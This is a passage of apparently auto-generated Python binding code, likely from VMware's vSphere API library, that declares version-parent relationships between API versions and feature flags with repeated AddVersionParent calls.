AddVersionParent("vim.version.guestDetailedData", "vim.version.version15")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version10")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version11")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version12")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.guestDetailedData", "vim.version.v7_0")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version8")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version9")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version6")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version7")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version1")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version4")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version5")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version2")
AddVersionParent("vim.version.guestDetailedData", "vim.version.version3")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.query.version.version4")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.query.version.version3")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.query.version.version2")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.query.version.version1")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.SGX_MPA_VMCheck")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.version.version0")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.version.version1")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.version.version2")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v6_9_1")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v6_8_7")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version13")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version14")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version15")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version10")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version11")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version12")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.v7_0")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version8")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version9")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version6")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version7")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version1")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version4")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version5")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version2")
AddVersionParent("vim.version.SGX_MPA_VMCheck", "vim.version.version3")
AddVersionParent("vim.version.vdcs", "vmodl.query.version.version4")
AddVersionParent("vim.version.vdcs", "vmodl.query.version.version3")
AddVersionParent("vim.version.vdcs", "vmodl.query.version.version2")
AddVersionParent("vim.version.vdcs", "vmodl.query.version.version1")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.vdcs", "vim.version.vdcs")
AddVersionParent("vim.version.vdcs", "vmodl.version.version0")
AddVersionParent("vim.version.vdcs", "vmodl.version.version1")
AddVersionParent("vim.version.vdcs", "vmodl.version.version2")
AddVersionParent("vim.version.vdcs", "vim.version.v6_9_1")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.vdcs", "vim.version.v6_8_7")
AddVersionParent("vim.version.vdcs", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.vdcs", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.vdcs", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.vdcs", "vim.version.version13")
AddVersionParent("vim.version.vdcs", "vim.version.version14")
AddVersionParent("vim.version.vdcs", "vim.version.version15")
AddVersionParent("vim.version.vdcs", "vim.version.version10")
AddVersionParent("vim.version.vdcs", "vim.version.version11")
AddVersionParent("vim.version.vdcs", "vim.version.version12")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.vdcs", "vim.version.v7_0")
AddVersionParent("vim.version.vdcs", "vim.version.version8")
AddVersionParent("vim.version.vdcs", "vim.version.version9")
AddVersionParent("vim.version.vdcs", "vim.version.version6")
AddVersionParent("vim.version.vdcs", "vim.version.version7")
AddVersionParent("vim.version.vdcs", "vim.version.version1")
AddVersionParent("vim.version.vdcs", "vim.version.version4")
AddVersionParent("vim.version.vdcs", "vim.version.version5")
AddVersionParent("vim.version.vdcs", "vim.version.version2")
AddVersionParent("vim.version.vdcs", "vim.version.version3")
AddVersionParent("vmodl.version.version0", "vmodl.version.version0")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.query.version.version4")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.query.version.version3")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.query.version.version2")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.query.version.version1")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.version.version0")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.NFS_VMKPORTBIND")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.version.version1")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.version.version2")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v6_9_1")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v6_8_7")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version13")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version14")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version15")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version10")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version11")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version12")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.v7_0")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version8")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version9")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version6")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version7")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version1")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version4")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version5")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version2")
AddVersionParent("vim.version.NFS_VMKPORTBIND", "vim.version.version3")
AddVersionParent("vmodl.version.version1", "vmodl.version.version0")
AddVersionParent("vmodl.version.version1", "vmodl.version.version1")
AddVersionParent("vmodl.version.version2", "vmodl.version.version0")
AddVersionParent("vmodl.version.version2", "vmodl.version.version1")
AddVersionParent("vmodl.version.version2", "vmodl.version.version2")
AddVersionParent("dp.version.version1", "vmodl.query.version.version4")
AddVersionParent("dp.version.version1", "vmodl.query.version.version3")
AddVersionParent("dp.version.version1", "vmodl.query.version.version2")
AddVersionParent("dp.version.version1", "vmodl.query.version.version1")
AddVersionParent("dp.version.version1", "vmodl.version.version0")
AddVersionParent("dp.version.version1", "vmodl.version.version1")
AddVersionParent("dp.version.version1", "vmodl.version.version2")
AddVersionParent("dp.version.version1", "dp.version.version1")
AddVersionParent("dp.version.version1", "vmodl.reflect.version.version1")
AddVersionParent("dp.version.version1", "vmodl.reflect.version.version2")
AddVersionParent("dp.version.version1", "vim.version.version13")
AddVersionParent("dp.version.version1", "vim.version.version14")
AddVersionParent("dp.version.version1", "vim.version.version15")
AddVersionParent("dp.version.version1", "vim.version.version10")
AddVersionParent("dp.version.version1", "vim.version.version11")
AddVersionParent("dp.version.version1", "vim.version.version12")
AddVersionParent("dp.version.version1", "vim.version.version8")
AddVersionParent("dp.version.version1", "vim.version.version9")
AddVersionParent("dp.version.version1", "vim.version.version6")
AddVersionParent("dp.version.version1", "vim.version.version7")
AddVersionParent("dp.version.version1", "vim.version.version1")
AddVersionParent("dp.version.version1", "vim.version.version4")
AddVersionParent("dp.version.version1", "vim.version.version5")
AddVersionParent("dp.version.version1", "vim.version.version2")
AddVersionParent("dp.version.version1", "vim.version.version3")
AddVersionParent("vim.version.v6_9_1", "vmodl.query.version.version4")
AddVersionParent("vim.version.v6_9_1", "vmodl.query.version.version3")
AddVersionParent("vim.version.v6_9_1", "vmodl.query.version.version2")
AddVersionParent("vim.version.v6_9_1", "vmodl.query.version.version1")
AddVersionParent("vim.version.v6_9_1", "vmodl.version.version0")
AddVersionParent("vim.version.v6_9_1", "vmodl.version.version1")
AddVersionParent("vim.version.v6_9_1", "vmodl.version.version2")
AddVersionParent("vim.version.v6_9_1", "vim.version.v6_9_1")
AddVersionParent("vim.version.v6_9_1", "vim.version.v6_8_7")
AddVersionParent("vim.version.v6_9_1", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v6_9_1", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v6_9_1", "vim.version.version13")
AddVersionParent("vim.version.v6_9_1", "vim.version.version14")
AddVersionParent("vim.version.v6_9_1", "vim.version.version15")
AddVersionParent("vim.version.v6_9_1", "vim.version.version10")
AddVersionParent("vim.version.v6_9_1", "vim.version.version11")
AddVersionParent("vim.version.v6_9_1", "vim.version.version12")
AddVersionParent("vim.version.v6_9_1", "vim.version.version8")
AddVersionParent("vim.version.v6_9_1", "vim.version.version9")
AddVersionParent("vim.version.v6_9_1", "vim.version.version6")
AddVersionParent("vim.version.v6_9_1", "vim.version.version7")
AddVersionParent("vim.version.v6_9_1", "vim.version.version1")
AddVersionParent("vim.version.v6_9_1", "vim.version.version4")
AddVersionParent("vim.version.v6_9_1", "vim.version.version5")
AddVersionParent("vim.version.v6_9_1", "vim.version.version2")
AddVersionParent("vim.version.v6_9_1", "vim.version.version3")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.query.version.version4")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.query.version.version3")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.query.version.version2")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.query.version.version1")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.version.version0")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.version.version1")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.version.version2")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v6_9_1")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.VMC_NFS_SUPPORT")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v6_8_7")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version13")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version14")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version15")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version10")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version11")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version12")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.v7_0")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version8")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version9")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version6")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version7")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version1")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version4")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version5")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version2")
AddVersionParent("vim.version.VMC_NFS_SUPPORT", "vim.version.version3")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.query.version.version4")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.query.version.version3")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.query.version.version2")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.query.version.version1")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.version.version0")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.version.version1")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.version.version2")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v6_9_1")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.NsxLiveUpdate")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v6_8_7")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.NsxLiveUpdate", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version13")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version14")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version15")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version10")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version11")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version12")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.v7_0")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version8")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version9")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version6")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version7")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version1")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version4")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version5")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version2")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.version3")
AddVersionParent("vim.version.NsxLiveUpdate", "vim.version.LiveUpdate")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.query.version.version4")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.query.version.version3")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.query.version.version2")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.query.version.version1")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.version.version0")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.version.version1")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.version.version2")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v6_9_1")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.VDS_ReadOnlyDisk")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v6_8_7")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version13")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version14")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version15")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version10")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version11")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version12")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.v7_0")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version8")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version9")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version6")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version7")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version1")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version4")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version5")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version2")
AddVersionParent("vim.version.VDS_ReadOnlyDisk", "vim.version.version3")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.query.version.version4")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.query.version.version3")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.query.version.version2")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.query.version.version1")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.version.version0")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.version.version1")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.version.version2")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.v6_9_1")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.v6_8_7")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v7_0_0_2", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version13")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version14")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version15")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version10")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version11")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version12")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.v7_0")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version8")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version9")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version6")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version7")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version1")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version4")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version5")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version2")
AddVersionParent("vim.version.v7_0_0_2", "vim.version.version3")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.query.version.version4")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.query.version.version3")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.query.version.version2")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.query.version.version1")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.version.version0")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.version.version1")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.version.version2")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v6_9_1")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.vVol_datastore_scalability")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v6_8_7")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.vVol_datastore_scalability", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version13")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version14")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version15")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version10")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version11")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version12")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.v7_0")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version8")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version9")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version6")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version7")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version1")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version4")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version5")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version2")
AddVersionParent("vim.version.vVol_datastore_scalability", "vim.version.version3")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.query.version.version4")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.query.version.version3")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.query.version.version2")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.query.version.version1")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.version.version0")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.version.version1")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.version.version2")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v6_9_1")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.AssignHwCompositeDev")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v6_8_7")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.AssignHwCompositeDev", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version13")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version14")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version15")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version10")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version11")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version12")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.v7_0")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version8")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version9")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version6")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version7")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version1")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version4")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version5")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version2")
AddVersionParent("vim.version.AssignHwCompositeDev", "vim.version.version3")
AddVersionParent("vim.version.v6_8_7", "vmodl.query.version.version4")
AddVersionParent("vim.version.v6_8_7", "vmodl.query.version.version3")
AddVersionParent("vim.version.v6_8_7", "vmodl.query.version.version2")
AddVersionParent("vim.version.v6_8_7", "vmodl.query.version.version1")
AddVersionParent("vim.version.v6_8_7", "vmodl.version.version0")
AddVersionParent("vim.version.v6_8_7", "vmodl.version.version1")
AddVersionParent("vim.version.v6_8_7", "vmodl.version.version2")
AddVersionParent("vim.version.v6_8_7", "vim.version.v6_8_7")
AddVersionParent("vim.version.v6_8_7", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.v6_8_7", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.v6_8_7", "vim.version.version13")
AddVersionParent("vim.version.v6_8_7", "vim.version.version14")
AddVersionParent("vim.version.v6_8_7", "vim.version.version15")
AddVersionParent("vim.version.v6_8_7", "vim.version.version10")
AddVersionParent("vim.version.v6_8_7", "vim.version.version11")
